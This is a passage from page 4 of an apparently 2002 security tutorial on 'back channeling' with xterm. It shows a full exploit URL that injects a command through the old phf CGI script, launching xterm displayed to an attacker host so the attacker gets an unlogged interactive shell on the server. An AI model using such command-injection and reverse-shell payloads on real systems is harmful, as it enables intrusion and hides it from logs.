News Register Control Panel Private Messages Members List Team Search News Posts About Us
 

Back Channeling using Xterm
  Author: Ravish Ahuja
Added: 12/21/2002
Type: Tutorial
Viewed: 13837 time(s)
Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10Average visitor rating of 9.3/10
Executing the attack

Now, the attacker needs to execute the command '/usr/X11R6/bin/xterm -ut -display evil.attacker's.i.p:0.0' by requesting for the following URL:

http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil.attacker's.i.p:0.0

After the exploit has been executed successfully the remote web server will simply execute the xterm with -display and -ut option enabled and display it back to the attacker's X server with the window id of 0 and screen id of 0. The activity will not be logged by the system as -ut option was enabled. Voila! The attacker has now gained interactive shell access and total control over the system.

Article Pages:  � Prev | 1 | 2 | 3 | 4 | Next �  


How would you rate this article:    Bad Good   Go � 


� Copyright Linux Advisory 2003. All rights reserved.
We are not responsible for the comment and story contributed by users.